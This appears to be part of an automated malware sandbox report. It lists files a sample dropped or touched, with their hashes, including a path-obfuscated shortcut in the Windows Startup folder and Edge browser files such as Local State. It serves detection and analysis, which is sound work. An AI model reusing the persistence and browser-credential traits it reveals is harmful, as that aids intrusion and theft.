SHA512 442142d7b58693f3c4b8b120018b546f25002021f92f2d7b379c56e9f29fea5466ed250eb9988a925ffb6e73af458199e1f2acfab3c563a9d3f6916994cedf84

C:\Users\Admin\APPDATA\ROAMING\otb3sp5YoAnjQIAldWgWz0nNg6yORVmS6SOKqIcNBFhVzkLeD5FRxFhfDprVA0HiXb3kwOnlT7bnaqDzr_angmHNHLLMHUo9RZQKh1QHxEt7ZWVYa8OCqDbPggxFJoilEQEu7ainxVtF80ijyOmjlFd6kcqDBHiTCve0fxKhqvWDw9

MD5 c0136cb8512630348c95d0b9ac1534c1
SHA1 7eb41f6061399e122ac051af8ddad4e9894e9c40
SHA256 8f8a02d5a80f919ee1c426108a816bc0a70598c8ecd0ab3a7f1892596c1bc973
SHA512 9c13ad8297b7e2a3f55d084c5f503ddf7fcc2ec4bd8f3237e4bfe59f2d777996562638efdd82f01eef648cd2742d36fedb276348aed1b6b18e7518e38f6ab042

C:\Users\Admin\AppData\Roaming\micROSOft\wInDOWs\sTaRT meNU\pRogrAMs\stArtUp\a7b096cca1b4fbb98a4fe4f7d33e9.LNK

MD5 cf4a1e65e06e85025694fcb4e5953f1c
SHA1 299adbff1892cbfd4e31237f0b6ca0c14bb7c00b
SHA256 b955cee13bae2f358993079821bec51e93799bb8d42028facfd763a91ae42485
SHA512 2275d2d4e5da8f8d9d33897c61b08a730bf7bd4ebb01d6a1f53b58b48f761384ebd7bac9e49825a3b7a2984f8545f568de042814ab96d1d1dfa35388aa4d883c

C:\Users\Admin\AppData\Roaming\micROSOft\wInDOWs\sTaRT meNU\pRogrAMs\stArtUp\a7b096cca1b4fbb98a4fe4f7d33e9.LNK

MD5 a1c0d90d1f67e6b770308dec6e8c6999
SHA1 8e48e8a124e1ccf743d9bf481055eebf7ccf9106
SHA256 e1e25eb9489f94456f45351d8e1ec172996afcdcb0568b53feedba90d9b79823
SHA512 357cd769cea5550e499485453e1921ae7985afc09d78212bacf33d0b6d75c221fc473aefad2ff8fb2c17f75d7630b0dc58897d3eed6b29a9895f93b7551fe285

C:\Users\Admin\AppData\Roaming\micROSOft\wInDOWs\sTaRT meNU\pRogrAMs\stArtUp\a7b096cca1b4fbb98a4fe4f7d33e9.LNK

MD5 61f4754133e4e29d534e5306f1a61310
SHA1 8f0d688500332cc79f6d76822fc1a38e039deea8
SHA256 a628bbee663ab1e2367c0988b1c707782ffd462d9e08de5f14db67e37535c931
SHA512 93515852f144e47f52e1c15f1d6cad75d04f71e984830bbab0a2950755e130bbcebf8750ce0644033fa7a4fe0f41f50a11f9e5b1f3be297043eceec829128afa

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 2a3686c646b4dd4b7fd3a46e12d65083
SHA1 47e371a587ef937f24282cb31453fc8b1612d546
SHA256 a358d10c555db708546facceef329c2faceddbd9be3157d45fea72e32b0264bf
SHA512 2224dadd45c10bd5bff82f2aa5036c3e2fe28d5fe7c2f2e117162afaab0d250924f4f649071d9e280f24618bc169b720997129a6a2bfba5b41491522fd38a8e4

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e68eaf8ec323122a0445d4ec4f824a04
SHA1 f9ff92431788e272647cd96f2009d555f5e88109
SHA256 404160a8d579c92e037b3542da60dcd02de6a7b4c0ef3dc4fa2c471bb9690216
SHA512 810df990547b187868ec159e9dc93c675326112e511c025c28f1062372ddabe2abb52ec94fca90148c88ce70c35bacf6fa67fb88c2f66c74c9dfd543718bf134

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 cfb75aa9785747ff630760c9cdf9c68d
SHA1 0fa3c93794ba3d016b9db1443a64abbcf68bf274
SHA256 baa84ab58623e64df95cbfa5c6d9c0083abe4cd1d76f2026d8424df12a6dee9b
SHA512 3b9e8b570d0155f5126cb5af31952ff63529ebf44929c14513d073618792f553362f6d57520ad95b8b7d172b613ff5154cd7ebbb0fedd659317382085c8e8887

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000e

MD5 f942900ff0a10f251d338c612c456948
SHA1 4a283d3c8f3dc491e43c430d97c3489ee7a3d320
SHA256 38b76a54655aff71271a9ad376ac17f20187abd581bf5aced69ccde0fe6e2fd6
SHA512 9b393ce73598ed1997d28ceeddb23491a4d986c337984878ebb0ae06019e30ea77448d375d3d6563c774856d6bc98ee3ca0e0ba88ea5769a451a5e814f6ddb41

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 d4d8cef58818612769a698c291ca3b37
SHA1 54e0a6e0c08723157829cea009ec4fe30bea5c50
SHA256 98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0
SHA512 f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 ce2130220e64b60da54ebbd8260a7743
SHA1 d1fb17a38d46602d348f92f07ae18c955580779c
SHA256 8515cd92ea0d20f6d39d836e9323c723bd06d9219530322ea62b32abdf160c61
SHA512 7c658cfcff9a6422b73de074f83b081f283f92a4bde4489d234e793f56f3972e3f6ceeeacc0bf2c298372e5edfb8bac1cc5bf8ce7931eb9a8c96f33c7abde618

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 f83d8001b8bbac66733006cf3dce6c7e
SHA1 ece894f87108b004a6edb72bd8d71e369abf0c40
SHA256 a19b84a77028dfd30fe4d8cf40b64ef156cc34f9c8c42c11d6ffb026770a0183
SHA512 c008738d9930e1635207495db7ecab22d3b9beebc07d6135490cd798be3b87f99873ab99eb733c8348f7c75d9ac96295d9761a5ea5ab9d63a3d719297e86c3da

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5860c8.TMP

MD5 e646e784af6c570d46d2478a59ce4c74
SHA1 c64861760db645229302e386780052b5cc18c999
SHA256 69d9f236302a7a0ebece1c40ca871600107fb6d8b022ca69342e5e61cc81bc21
SHA512 3a35f5214be2ad173ce4ab39afca4a6eb87c8b99b6f9e7cd5f52d3ec3605d5d2446a331b345b68eeac3b8ec5ac3f6c14bb3829831ff25b3db2b8a0ff57df3539

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 7dc80d1b52f1d568d6756f20e3429e34
SHA1 7bd43a6f6b904d32540a50738372630d4a6d9f8c
SHA256 eba69c3c36c07bf558785590861c477d5753c5663da4da5d7b3707a5b48bbaa9
SHA512 13550886a18d720c60f9541b9384a25316a6cb7c7a408b2ed8bdc8957fac7f9590a03304e1a7a0cc57d011aeb19f84275ce3e062aad80a09f4b913211c0ff243

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 4e67eb0ffea2bd46e6cefdac15f2d220
SHA1 553e59d0cc0d69a951a20390e45c3ac26e497298
SHA256 30ded989fb0a251142a63e0eceb192b6c5edc4e2acebabacbd2e2803062f0e51
SHA512 e5a9cb707ddad5e74b64706c0429dd1e0e21d569e041353ea8380f7ba039d09e9f35ec70f35885f55d9ed393fd55e24a81d92c1fb529317d7b35a9f1b333135f